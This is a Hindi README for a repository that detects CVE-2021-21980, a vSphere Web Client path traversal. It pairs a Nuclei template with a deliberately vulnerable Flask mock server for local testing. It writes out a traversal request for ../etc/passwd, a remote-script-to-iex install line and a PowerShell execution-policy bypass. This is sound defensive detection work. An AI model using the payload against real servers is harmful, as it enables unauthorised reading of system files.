
CVE-2021-21980
इस रिपॉज़िटरी में CVE-2021-21980 (vSphere Web Client path traversal) का पता लगाने के लिए एक उच्च-विश्वसनीयता वाला Nuclei टेम्पलेट और एक छोटा मॉक वातावरण है जो सुरक्षित स्थानीय परीक्षण के लिए कमज़ोर व्यवहार की प्रतिकृति बनाता है।
फ़ाइलें:
cve-2021-21980.yaml: एकाधिक एन्कोडिंग वेरिएंट और मैचर्स वाला Nuclei टेम्पलेटapp.py: /eam/vib path traversal भेद्यता का अनुकरण करने वाला एक छोटा Flask ऐपDockerfile: स्व-हस्ताक्षरित TLS प्रमाणपत्र के साथ मॉक सर्वर के लिए कंटेनर इमेजdocker-compose.yml: होस्ट 8443 पर सुनने वाले मॉक सर्वर को चलाता हैrequirements.txt: Python निर्भरताएँcd C:\Users\gui\Documents\hi
docker-compose up --build -d
मॉक सर्वर https://localhost:8443 पर सुनेगा (स्व-हस्ताक्षरित TLS प्रमाणपत्र)।
curl -k "https://localhost:8443/" # should return VMware vSphere Web Client (mock)
curl -k "https://localhost:8443/eam/vib?id=../../../../../../../../../../etc/passwd"
आपको मॉक /app/sensitive/passwd-mock फ़ाइल की सामग्री प्राप्त होनी चाहिए।
nuclei -t cve-2021-21980.yaml -u https://localhost:8443 -insecure
यदि आप कई एन्कोडिंग वेरिएंट का परीक्षण करना चाहते हैं, तो Nuclei टेम्पलेट को उच्च verbosity के साथ चलाने के लिए सेट करें।
run_local_test.ps1 चलाएँ जो बिल्ड करता है, तैयारी की प्रतीक्षा करता है और curl जाँचें निष्पादित करता है, साथ ही उपलब्ध होने पर Nuclei भी।
powershell -ExecutionPolicy Bypass -File .\run_local_test.ps1
Windows पर Nuclei इंस्टॉल करें (त्वरित):
iwr -useb get.scoop.sh | iex
scoop install coreutils
scoop install nuclei
Invoke-WebRequest -Uri https://github.com/projectdiscovery/nuclei/releases/latest/download/nuclei_windows_amd64.zip -OutFile nuclei.zip
Expand-Archive -Path nuclei.zip -DestinationPath .\nuclei
Add-Content -Path $PROFILE -Value 'set PATH=$Env:PATH;$(Resolve-Path .\nuclei)'
यदि PATH में नहीं है तो केवल curl परीक्षणों तक ही निष्पादित होगा। यदि आपको docker इमेज बनाने में समस्या आती है, तो सुनिश्चित करें कि Docker Desktop इंस्टॉल है और 'Use the WSL 2 based engine' सक्षम है। यदि सर्वर कमज़ोर है तो /etc/passwd या समान फ़ाइल लौटाई जाएगी।
सुरक्षा: सिस्टम को स्कैन करने या उनका शोषण करने से पहले हमेशा स्पष्ट प्राधिकरण लें।
nucleirun_local_test.ps1